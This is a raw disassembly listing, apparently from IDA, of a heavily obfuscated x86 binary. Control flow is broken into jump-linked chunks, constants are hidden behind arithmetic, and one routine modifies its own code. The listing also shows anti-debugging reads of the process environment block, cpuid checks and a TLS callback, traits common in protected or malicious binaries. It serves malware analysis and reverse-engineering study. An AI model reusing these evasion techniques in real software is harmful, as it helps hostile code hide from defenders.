sub_42A36A proc near ; CODE XREF: sub_424A57+3�p
; FUNCTION CHUNK AT 00421D13 SIZE 00000001 BYTES
mov [esp+0], eax
pop eax
mov ebp, esp
jmp loc_421D13
sub_42A36A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42A375: ; CODE XREF: _94j21ax3:0042BD5F�j
rol eax, 0Dh
push eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42960D
loc_42A37A: ; CODE XREF: sub_42960D+17�j
jmp nullsub_211
; END OF FUNCTION CHUNK FOR sub_42960D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C49
loc_42A37F: ; CODE XREF: sub_428C49+1D8�j
jmp nullsub_172
; END OF FUNCTION CHUNK FOR sub_428C49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42A384: ; CODE XREF: sub_42C0BC-3B39�j
jmp nullsub_191
; END OF FUNCTION CHUNK FOR sub_42C0BC
; =============== S U B R O U T I N E =======================================
sub_42A389 proc near ; CODE XREF: sub_42B358+E�p
; FUNCTION CHUNK AT 00421929 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424A08 SIZE 00000010 BYTES
push ebp
jmp loc_424A08
sub_42A389 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_42A38F: ; CODE XREF: sub_42AA5F:loc_4248C3�j
and eax, edx
jnz loc_42A3E2
jmp loc_426F5E
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
loc_42A39C: ; DATA XREF: sub_42773C:loc_4294D9�o
jnz loc_42AE45
; START OF FUNCTION CHUNK FOR sub_42773C
loc_42A3A2: ; CODE XREF: sub_4232F5-664�j
; sub_4232F5:loc_42514A�j ...
jb loc_42A016
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
jnz loc_42AE45
mov eax, [ebp+8]
jmp loc_4259F6
; END OF FUNCTION CHUNK FOR sub_42773C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426FE1
loc_42A3BD: ; CODE XREF: sub_426FE1-1434�j
push eax
push 0EED44C9Eh
pop eax
call sub_42972F
; END OF FUNCTION CHUNK FOR sub_426FE1
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42A3C9: ; CODE XREF: sub_423FCD+7BB8�j
jmp loc_422CFC
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42A3CE: ; CODE XREF: sub_423324+4B95�j
and esi, 84D53A36h
jns loc_428D8F
shr eax, 12h
jmp loc_421A63
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_42A3E2: ; CODE XREF: _94j21ax3:0042444F�j
; _94j21ax3:004248B7�j ...
mov dword ptr [ebp-8], 1
jmp loc_42B291
; END OF FUNCTION CHUNK FOR sub_42AA5F
; =============== S U B R O U T I N E =======================================
sub_42A3EE proc near ; CODE XREF: sub_427CAC-3B49�p
; sub_427A68:loc_4246D5�p ...
jno sub_422392
push offset sub_4272E9
jmp nullsub_102
sub_42A3EE endp
; ---------------------------------------------------------------------------
jmp sub_4267C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42A403: ; CODE XREF: sub_42C0BC-A8C0�j
jns loc_427484
mov eax, large fs:30h
loc_42A410: ; CODE XREF: _94j21ax3:004276B4�j
add eax, 20h
mov eax, [eax]
push ebx
jmp loc_4220CE
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
loc_42A41B: ; DATA XREF: sub_421CAA+56AB�o
jz loc_421AFB
add eax, 7D0h
mov [ebp-8], eax
push 2
jmp loc_429D2B
; =============== S U B R O U T I N E =======================================
sub_42A430 proc near ; CODE XREF: sub_421F28+72D8�p
; _94j21ax3:0042B12A�j
mov [esp+0], eax
pop eax
loc_42A434: ; CODE XREF: sub_423324-1B10�j
add [esi], eax
push offset sub_426A9F
jmp nullsub_103
sub_42A430 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42A440 proc near ; DATA XREF: sub_422973+5ED5�o
; FUNCTION CHUNK AT 0042569C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B25D SIZE 00000007 BYTES
push edi
pushf
loc_42A442: ; CODE XREF: _94j21ax3:loc_4231C7�j
push 7DEA410h
pop edi
add edi, 0F863E442h
popf
jmp loc_42569C
sub_42A440 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_199. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_42A455: ; CODE XREF: sub_4281A5-17BE�j
jmp loc_424A7B
; END OF FUNCTION CHUNK FOR sub_4281A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42A45A: ; CODE XREF: sub_42B9CF-3811�j
add esi, 0E6D12190h
or ebx, edi
jmp loc_426FC9
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429D19
loc_42A467: ; CODE XREF: sub_429D19+1�j
mov ebp, esp
call sub_42B396
; END OF FUNCTION CHUNK FOR sub_429D19
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42A46E: ; CODE XREF: sub_42284F+2016�j
jmp loc_4270EF
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_42A473: ; CODE XREF: sub_421689:loc_423D80�j
pop edi
add edi, 5867F8AAh
and edi, 5932127Ch
test edi, 20h
jmp loc_42B1E7
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
call loc_421604
jmp loc_420000
; ---------------------------------------------------------------------------
loc_42A495: ; CODE XREF: _94j21ax3:00423F11�j
jmp loc_428D04
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ebp, esp
jnb loc_426923
add esp, 0FFFFFFCCh
lea eax, nullsub_9
mov byte ptr [eax], 0C3h
jmp loc_429A92
; ---------------------------------------------------------------------------
shr edi, 15h
cdq
jmp sub_422F50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42A4BD: ; CODE XREF: sub_4272E9+3296�j
jno loc_427E5A
push esi
mov eax, [ebx]
loc_42A4C6: ; CODE XREF: sub_4272E9:loc_4227DC�j
call sub_4292D7
loc_42A4CB: ; CODE XREF: sub_426DA4:loc_424721�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428DA6
loc_42A4CD: ; CODE XREF: sub_428DA6-17A5�j
jmp sub_42A7EA
; END OF FUNCTION CHUNK FOR sub_428DA6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421457
loc_42A4D2: ; CODE XREF: sub_424A57-955�j
; sub_421457:loc_427B42�j
push offset loc_426736
jmp sub_426D61
; END OF FUNCTION CHUNK FOR sub_421457
; =============== S U B R O U T I N E =======================================
sub_42A4DC proc near ; CODE XREF: sub_421126+1C5�p
; _94j21ax3:loc_425AFA�j ...
; FUNCTION CHUNK AT 0042BF0F SIZE 00000002 BYTES
mov [esp+0], ecx
pop ecx
push ebx
push 1650E98Dh
pop ebx
add ebx, 0E9F156CBh
mov [ebx], eax
jmp loc_42BF0F
sub_42A4DC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42A4F4 proc near ; CODE XREF: _94j21ax3:00421B8C�j
; _94j21ax3:0042A21F�p
; FUNCTION CHUNK AT 00426E8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004297BF SIZE 00000009 BYTES
xchg ebx, [esp+0]
pop ebx
push 506BC688h
add dword ptr [esp+0], 0AF9439B8h
lea eax, [ebp-64h]
jmp loc_426E8F
sub_42A4F4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42A50C: ; CODE XREF: sub_42284F+1DA2�j
add ecx, edx
rol ecx, 1Ch
pop ebx
pop edx
pop eax
pop ecx
pop ebp
jmp loc_429473
; END OF FUNCTION CHUNK FOR sub_42284F
; =============== S U B R O U T I N E =======================================
sub_42A51B proc near ; DATA XREF: sub_42A77E+9�o
pop ebp
call sub_425790
locret_42A521: ; CODE XREF: sub_421D33:loc_42B5F7�j
retn
sub_42A51B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 0C281h
; ---------------------------------------------------------------------------
fcom dword ptr [ebx]
add byte ptr [edi+ecx-4CCC76h], 0FFh
jmp sub_424775
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CAC
loc_42A533: ; CODE XREF: sub_427CAC:loc_42B818�j
jz loc_4294BD
add eax, edx
xor eax, ebx
add eax, ecx
jmp loc_42BE32
; END OF FUNCTION CHUNK FOR sub_427CAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42426B
loc_42A544: ; CODE XREF: sub_42426B:loc_42331F�j
push ecx
mov esp, ebp
loc_42A547: ; CODE XREF: _94j21ax3:loc_42792B�j
pop ebp
push 7DB1D70Bh
pop eax
call sub_42BEFA
loc_42A553: ; CODE XREF: sub_42875C-4A8�j
jmp loc_42503D
; END OF FUNCTION CHUNK FOR sub_42426B
; ---------------------------------------------------------------------------
loc_42A558: ; CODE XREF: _94j21ax3:00424024�j
jmp loc_429394
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42A55D: ; CODE XREF: sub_42284F+3F�j
xor ecx, ebp
mov ebx, ecx
mov ecx, 0B3F14E36h
; END OF FUNCTION CHUNK FOR sub_42284F
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42A566: ; CODE XREF: sub_42284F:loc_421221�j
; sub_422EB0-1029�j ...
js loc_424ABC
push 0
jmp loc_42162D
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_42A573: ; CODE XREF: sub_4272E9-4B07�j
xor esi, 0BB5A7A25h
test eax, 26F81AE8h
jmp loc_42A4BD
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42A584: ; CODE XREF: sub_423324:loc_429F68�j
push 5C6489B2h
pop eax
xor eax, 69207F0Ah
add eax, ebp
; END OF FUNCTION CHUNK FOR sub_423324
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42A592: ; CODE XREF: sub_422EB0:loc_42813D�j
jmp loc_421AE4
; END OF FUNCTION CHUNK FOR sub_422EB0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_71. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427849
loc_42A598: ; CODE XREF: sub_427849+2752�j
jmp loc_42B41D
; END OF FUNCTION CHUNK FOR sub_427849
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_42A59D: ; CODE XREF: sub_421402+50�j
jmp loc_4283EC
; END OF FUNCTION CHUNK FOR sub_421402
; =============== S U B R O U T I N E =======================================
sub_42A5A2 proc near ; CODE XREF: _94j21ax3:0042225C�j
; sub_42430C+5477�p
; FUNCTION CHUNK AT 004239A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428CC4 SIZE 00000011 BYTES
xchg edi, [esp+0]
pop edi
push ebx
push 0CD1FE80Dh
mov ebx, ebp
jmp loc_4239A0
sub_42A5A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42A5B3: ; CODE XREF: _94j21ax3:00425B06�j
jns loc_424721
; =============== S U B R O U T I N E =======================================
sub_42A5B9 proc near ; CODE XREF: sub_429A83-6A48�j
; sub_4225A5+D1B�p
; FUNCTION CHUNK AT 00429BDD SIZE 00000005 BYTES
mov [esp+0], edx
pop edx
movzx eax, byte ptr [eax]
mov [ebp-1Ch], eax
push offset loc_429429
loc_42A5C8: ; CODE XREF: sub_423324+3D30�j
jmp loc_429BDD
sub_42A5B9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429382
loc_42A5CD: ; CODE XREF: sub_429382:loc_424742�j
call sub_42966A
loc_42A5D2: ; CODE XREF: sub_422538:loc_42BD8A�j
sub edx, 7762A26Ch
and edx, 0AE36DF94h
xor edx, 129F006Fh
add edx, ebp
add edx, 4550ADEDh
jmp loc_423D9D
; END OF FUNCTION CHUNK FOR sub_429382
; ---------------------------------------------------------------------------
loc_42A5F1: ; CODE XREF: _94j21ax3:00427AE6�j
xor eax, 0CBBAA23h
add eax, ebp
add eax, 0D6D13558h
mov eax, [eax]
jmp loc_42A088
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422F50
loc_42A606: ; CODE XREF: sub_422F50+11�j
mov eax, [ebp-0Ch]
push offset sub_423F32
jmp sub_4295BA
; END OF FUNCTION CHUNK FOR sub_422F50
; =============== S U B R O U T I N E =======================================
sub_42A613 proc near ; CODE XREF: sub_4220B7-1039�p
xchg eax, [esp+0]
mov eax, [esp+0]
call sub_423F43
retn
sub_42A613 endp
; =============== S U B R O U T I N E =======================================
sub_42A61F proc near ; CODE XREF: sub_4259BF-415E�p
; _94j21ax3:00424014�p ...
; FUNCTION CHUNK AT 0042374A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004287AF SIZE 00000005 BYTES
jb loc_42374A
push ebp
push offset loc_42BCEE
jmp nullsub_108
sub_42A61F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425324
loc_42A630: ; CODE XREF: sub_425324-3565�j
test edx, ecx
jmp loc_4230D0
; END OF FUNCTION CHUNK FOR sub_425324
; ---------------------------------------------------------------------------
ror edx, 1
push ebx
jmp sub_42445A
; =============== S U B R O U T I N E =======================================
sub_42A63F proc near ; CODE XREF: sub_429259-609C�p
xchg eax, [esp+0]
mov eax, [esp+0]
ror eax, 0Dh
mov ds:dword_429F8C, eax
retn
sub_42A63F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236B8
loc_42A64F: ; CODE XREF: sub_4236B8+6�j
jmp nullsub_109
; END OF FUNCTION CHUNK FOR sub_4236B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429EDB
loc_42A654: ; CODE XREF: sub_429EDB:loc_42BDEF�j
jnz loc_426455
jmp loc_42BF8A
; END OF FUNCTION CHUNK FOR sub_429EDB
; ---------------------------------------------------------------------------
popf
jmp sub_423081
; ---------------------------------------------------------------------------
loc_42A665: ; DATA XREF: sub_422EB0+3E3A�o
cpuid
and eax, 2FFFh
add [esi], eax
and ebx, 0FFFF07h
add [esi], ebx
xor [esi], edx
jmp loc_4291E2
; =============== S U B R O U T I N E =======================================
sub_42A67D proc near ; CODE XREF: sub_428F65-457D�p
; sub_42A1E5+3�j
mov eax, 4F8C9AD3h
jmp nullsub_110
sub_42A67D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42A687: ; CODE XREF: sub_423F55-14B�j
mov edx, offset loc_42A695
xchg edx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428993
loc_42A690: ; CODE XREF: sub_428993-85B�j
jmp sub_428AE1
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
loc_42A695: ; DATA XREF: sub_423F55:loc_42A687�o
pop ebp
jmp loc_426485
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EE4
loc_42A69B: ; CODE XREF: sub_424EE4+4D7�j
ror ebx, 16h
call sub_429447
loc_42A6A3: ; CODE XREF: _94j21ax3:004272AD�j
jmp loc_429780
; END OF FUNCTION CHUNK FOR sub_424EE4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_42A6A8: ; CODE XREF: sub_42169F+5000�j
jmp loc_42715B
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_42A6AD: ; CODE XREF: sub_42A7A6:loc_42946E�j
add [ebp-8], eax
call sub_42194B
loc_42A6B5: ; CODE XREF: sub_42ADA2+C5D�j
add esi, eax
or ebx, ebp
test ebp, ebx
jmp loc_426ECA
; END OF FUNCTION CHUNK FOR sub_42A7A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42A6C0: ; CODE XREF: sub_428BBD-573C�j
mov edx, eax
loc_42A6C2: ; CODE XREF: sub_428BBD:loc_426E71�j
lea eax, [ebp-800h]
call sub_4267C6
; END OF FUNCTION CHUNK FOR sub_428BBD
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42A6CD: ; CODE XREF: sub_42284F-138D�j
js loc_427536
sbb ebx, 659D2346h
or ebx, ecx
jmp loc_42A566
; ---------------------------------------------------------------------------
loc_42A6E0: ; CODE XREF: sub_42284F:loc_427EEB�j
cmp dword ptr [ebp-4], 7
jnz loc_427BB3
jmp loc_429022
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
loc_42A6EF: ; CODE XREF: _94j21ax3:loc_42ACF7�j
pushf
mov [esp], ebp
mov ebp, esp
xchg ecx, ebp
push ebp
jmp loc_422EE0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_194. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42A6FE: ; CODE XREF: sub_42484C+488E�j
jmp nullsub_112
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421ABD
loc_42A703: ; CODE XREF: sub_421ABD+1A�j
jmp loc_4291AF
; END OF FUNCTION CHUNK FOR sub_421ABD
; ---------------------------------------------------------------------------
locret_42A708: ; CODE XREF: _94j21ax3:0042C0F1�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A709 proc near ; CODE XREF: sub_4288D4+7�p
; sub_426626:loc_42BC61�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00427CCD SIZE 00000012 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
jmp loc_427CCD
sub_42A709 endp
; ---------------------------------------------------------------------------
xor ebx, edx
jmp sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A57
loc_42A71E: ; CODE XREF: sub_424A57-78C�j
mov ebp, esp
push ecx
mov esp, ebp
xchg eax, [esp+4+var_4]
mov ebp, eax
jmp loc_4240F9
; END OF FUNCTION CHUNK FOR sub_424A57
; =============== S U B R O U T I N E =======================================
sub_42A72D proc near ; CODE XREF: sub_423900+C�p
xchg eax, [esp+0]
pop eax
mov edx, [ebp-8]
mov [edx], al
call sub_425808
sub_42A72D endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_60. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DA4
loc_42A73C: ; CODE XREF: sub_426DA4+45AF�j
jmp loc_42349D
; END OF FUNCTION CHUNK FOR sub_426DA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427A68
loc_42A741: ; CODE XREF: sub_427A68:loc_424071�j
add eax, 0C2A82559h
mov eax, [eax]
popf
push eax
jmp loc_4246D5
; END OF FUNCTION CHUNK FOR sub_427A68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428993
loc_42A750: ; CODE XREF: sub_428993-2098�j
; sub_428993:loc_4283BA�j
push 0D34F4CABh
pop edx
add edx, 47D86499h
add edx, ebp
jmp loc_42511D
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
locret_42A763: ; CODE XREF: _94j21ax3:loc_42392F�j
retn
; ---------------------------------------------------------------------------
js loc_42A9D6
jmp loc_42B30E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_45. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42A770 proc near ; CODE XREF: _94j21ax3:00426851�j
; sub_42A440:loc_42B25D�p
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
xchg edi, [esp-4+arg_0]
jmp sub_4239A5
sub_42A770 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42A77C: ; CODE XREF: _94j21ax3:00428F12�j
xchg edi, edx
; =============== S U B R O U T I N E =======================================
sub_42A77E proc near ; CODE XREF: sub_425168+8�p
arg_0 = dword ptr 4
mov [esp+0], ebx
pop ebx
mov [esp-4+arg_0], ecx
mov esp, ebp
push offset sub_42A51B
jmp loc_42240F
sub_42A77E endp
; =============== S U B R O U T I N E =======================================
sub_42A791 proc near ; CODE XREF: _94j21ax3:004225F4�j
; sub_424320+6�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042378A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AE21 SIZE 00000019 BYTES
mov [esp+0], esi
pop esi
push 3D6A296h
pop edx
xor edx, 4FBB49B5h
jmp loc_42378A
sub_42A791 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42A7A6 proc near ; CODE XREF: _94j21ax3:00423BF3�j
; TlsCallback_0+4�p
; FUNCTION CHUNK AT 004217D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421C2D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004220F0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00422420 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00422F1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042386D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00426ECA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042709A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042843E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428509 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042913D SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042946E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A6AD SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042B996 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042C405 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
jo loc_42913D
call sub_428381
loc_42A7B5: ; CODE XREF: sub_42A7EA�j
; DATA XREF: sub_425539+52A7�o
pop ecx
mov edx, [ebp+8]
imul dword ptr [edx-4]
add eax, 2
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
jmp loc_42946E
sub_42A7A6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425539
loc_42A7CA: ; CODE XREF: sub_425539:loc_42378F�j
mov [ebp-8], eax
mov eax, [ebp+8]
push eax
mov eax, [ebp+8]
test byte ptr [eax-8], 8
setnz al
loc_42A7DB: ; CODE XREF: _94j21ax3:00426A65�j
call sub_4215F9
push offset loc_42A7B5
jmp nullsub_115
; END OF FUNCTION CHUNK FOR sub_425539
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42A7EA proc near ; CODE XREF: sub_428DA6:loc_42A4CD�j
retn
sub_42A7EA endp
; ---------------------------------------------------------------------------
loc_42A7EB: ; CODE XREF: _94j21ax3:loc_424DD7�j
jnz loc_42C179
jmp loc_4281F8
; ---------------------------------------------------------------------------
loc_42A7F6: ; CODE XREF: _94j21ax3:0042B566�j
jo loc_422AFC
; =============== S U B R O U T I N E =======================================
sub_42A7FC proc near ; CODE XREF: sub_425868+6�p
; FUNCTION CHUNK AT 00421C1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425415 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004287CE SIZE 0000000F BYTES
mov [esp+0], esi
pop esi
push ecx
cmp ds:dword_42C488, 0
jz loc_4258F6
mov eax, ds:dword_42C488
mov eax, [eax]
jmp loc_421C1B
sub_42A7FC endp
; =============== S U B R O U T I N E =======================================
sub_42A81A proc near ; CODE XREF: _94j21ax3:loc_42BDEE�j
; DATA XREF: sub_42BDD7+D�o
; FUNCTION CHUNK AT 0042514F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042545A SIZE 00000005 BYTES
push eax
call sub_4247A2
pop eax
pop eax
push eax
push 0FFFFFFFFh
push eax
call sub_42AA5F
jmp loc_42545A
sub_42A81A endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_120. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_32. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B43F
loc_42A832: ; CODE XREF: sub_42B43F-4F1�j
jmp sub_42574E
; END OF FUNCTION CHUNK FOR sub_42B43F
; ---------------------------------------------------------------------------
loc_42A837: ; CODE XREF: _94j21ax3:00427F7D�j
jmp loc_426504
; ---------------------------------------------------------------------------
loc_42A83C: ; CODE XREF: _94j21ax3:0042B887�j
ror edi, 1Bh
; =============== S U B R O U T I N E =======================================
sub_42A83F proc near ; CODE XREF: sub_4267C6-1D8E�p
arg_4 = dword ptr 8
xchg ebx, [esp+0]
pop ebx
add ecx, 0B68FF70Bh
popf
xchg ecx, [esp-8+arg_4]
jmp sub_42A61F
sub_42A83F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42A852 proc near ; CODE XREF: _94j21ax3:004214D5�j
; _94j21ax3:00427E51�p
mov [esp+0], ecx
pop ecx
mov edx, 0DE6CF580h
call sub_4239A5
push eax
sub_42A852 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42270C
loc_42A861: ; CODE XREF: sub_42270C+A4C�j
ror eax, 0Bh
push esi
push 0FBA8280Fh
jmp loc_424E5F
; END OF FUNCTION CHUNK FOR sub_42270C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429EDB
loc_42A86F: ; CODE XREF: _94j21ax3:00427F77�j
; sub_429EDB+6�j
push 0AA916A07h
pop eax
add eax, 0FB9B0E5Ah
push offset loc_421435
jmp nullsub_221
; END OF FUNCTION CHUNK FOR sub_429EDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422141
loc_42A885: ; CODE XREF: sub_422141:loc_426F26�j
push ecx
xchg eax, ecx
mov eax, [ebp-8]
push offset sub_428F6D
jmp nullsub_203
; END OF FUNCTION CHUNK FOR sub_422141
; ---------------------------------------------------------------------------
mov esi, [eax]
jmp sub_4294B3
; ---------------------------------------------------------------------------
ror eax, 12h
jmp sub_423C3E
; ---------------------------------------------------------------------------
loc_42A8A4: ; CODE XREF: _94j21ax3:loc_426A13�j
jnz loc_424AAE
jmp loc_429F23
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427668
loc_42A8AF: ; CODE XREF: sub_427668:loc_429109�j
jnz loc_427EEB
jmp loc_4244F1
; END OF FUNCTION CHUNK FOR sub_427668
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_133. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A8BB proc near ; CODE XREF: sub_425B77-36E7�j
; sub_42972F-10A2�j
; FUNCTION CHUNK AT 00426DE1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042B092 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_42B092
sub_42A8BB endp
; ---------------------------------------------------------------------------
loc_42A8C7: ; CODE XREF: _94j21ax3:00423D3D�j
jl loc_429487
; =============== S U B R O U T I N E =======================================
sub_42A8CD proc near ; CODE XREF: _94j21ax3:00429083�p
xchg esi, [esp+0]
pop esi
jz loc_427103
sub_42A8CD endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42982D
loc_42A8D7: ; CODE XREF: sub_42982D:loc_42323D�j
mov eax, [ebp-4]
push offset dword_42BD40
jmp loc_426F59
; END OF FUNCTION CHUNK FOR sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_42A8E4: ; CODE XREF: sub_421047+6856�j
mov [edx], al
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
cmp byte ptr [eax], 2Eh
push offset loc_422C24
jmp loc_427498
; END OF FUNCTION CHUNK FOR sub_421047
; ---------------------------------------------------------------------------
loc_42A8F9: ; CODE XREF: _94j21ax3:004293F6�j
push edi
mov [ebp+0], esi
; START OF FUNCTION CHUNK FOR sub_421402
loc_42A8FD: ; CODE XREF: sub_421402:loc_4293E5�j
sub ebx, 40910F24h
add ebx, 0DDF380A0h
xchg ebx, [esp+10h+var_10]
add [esp+10h+var_10], 0D17C99AFh
push edi
jmp loc_421CD6
; END OF FUNCTION CHUNK FOR sub_421402
; =============== S U B R O U T I N E =======================================
sub_42A919 proc near ; CODE XREF: _94j21ax3:0042B04D�j
; sub_42AC2D+1079�p
; FUNCTION CHUNK AT 00424940 SIZE 00000009 BYTES
mov [esp+0], esi
pop esi
jz loc_424940
